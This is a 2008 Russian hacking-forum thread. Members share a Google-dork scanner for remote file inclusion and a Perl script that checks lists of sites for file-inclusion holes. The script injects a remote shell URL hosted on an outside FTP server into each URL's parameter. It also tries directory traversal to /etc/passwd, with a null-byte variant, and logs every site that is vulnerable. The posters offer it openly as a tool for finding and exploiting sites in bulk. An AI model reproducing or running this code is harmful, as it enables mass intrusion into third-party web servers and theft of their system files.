Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Google Remote File Inclusion Scanner |
04.10.2008, 10:41
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Google Remote File Inclusion Scanner
Как пользоваться:
Заливаем скрипт на сервак и запускаем.
1.Variable: Здесь Вы должны ввести переменную которую вы хотите искать
Например : page= , pag= , q= , a= , n= и тд.
2. Google page: тут предлагаю писать 0, это даст возможность посмотреть результатов.
3. Search string: сюда мы пишем только запросы ввиде allinurl:".php?a=" .htm заменить на .php?a=
Скачать:
(c) secnull
|
|
|
04.10.2008, 10:49
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
писал подобную херь на перле, где то на винте валяется, только под icq.com, а не гугл
|
|
|
|
04.10.2008, 18:59
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427
Репутация:
766
|
|
Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)
|
|
|
|
04.10.2008, 19:08
|
|
Познающий
Регистрация: 29.07.2007
Сообщений: 44
Провел на форуме:
532652
Репутация:
28
|
|
Сообщение от nonamez
Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)
Как я понял, для поиска сайтов, с возможной уязвимотью php-inj. Тоже самое можно сделать просто поиском в гугле, запросом
allinurl:".php?page="
|
|
|
|
25.10.2008, 12:39
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
может конечно глупый вопрос но тулза чекает инклуды после нахождения большой базы
Спайдер
давай выкладывай свой супер мего скриптег =) хочеться глянуть возможно даже в ЛС  |
|
|
|
26.10.2008, 23:14
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
satana8920, оказалось что не совсем то же самое, вобщем вот код
Код:
#!perl
use LWP
$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата
$rshell = 'ftp://omfg0o:spyder@ftp.narod.ru/antichat.php?.html'; # Удалённый инклуд, поменять на своё значение
$lshell = '/../../../../../../../../../../../../../../../../../../../../etc/passwd'; # Локальный инклуд
$timeout = 15;
$var = "$ARGV[0]";
open (LIST, "$list") or die $!;
open (RES, ">$res") or die $!;
while (<LIST>) {
$_=~ /$var/;
$url = "$`"."$var"."="."$rshell";
print "Now checking : $url\n";
$agent = LWP::UserAgent->new();
$agent -> timeout($timeout);
$req = HTTP::Request->new(GET => $url);
$resp = $agent->request($req);
$body = $resp->content;
if ($body =~ m/ANTICHAT/) {
print RES "$url\n";
}
$url = "$`"."$var"."="."$lshell";
print "Now checking : $url\n";
$req = HTTP::Request->new(GET => $url);
$resp = $agent->request($req);
$body = $resp->content;
if ($body =~ m/root:x:0:0/) {
print RES "$url\n";
} else {
$url = "$`"."$var"."="."$lshell".'%00';
print "Now checking : $url\n";
$req = HTTP::Request->new(GET => $url);
$resp = $agent->request($req);
$body = $resp->content;
if ($body =~ m/root:x:0:0/) {
print RES "$url\n";
}
}
}
Вобщем это чекер локальных и удалённых инклудов, работает он с файлом ссылок. Получить этот файл ссылок можно каким нить гугл грабером или моей тузлой для icq.com
https://forum.antichat.ru/thread56927.html
работоспособность этих двух скриптов не гарантирую, если чё пиши в пм =) |
|
|
|
26.10.2008, 23:54
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то
|
|
|
|
27.10.2008, 00:10
|
|
Banned
Регистрация: 03.08.2008
Сообщений: 28
Провел на форуме:
328250
Репутация:
124
|
|
Сообщение от satana8920
посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то
тоже самое((( 
|
|
|
|
27.10.2008, 00:16
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
код почитайте
$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата
|
|
|
|
27.10.2008, 00:19
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
и вообще почитайте мой пост
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
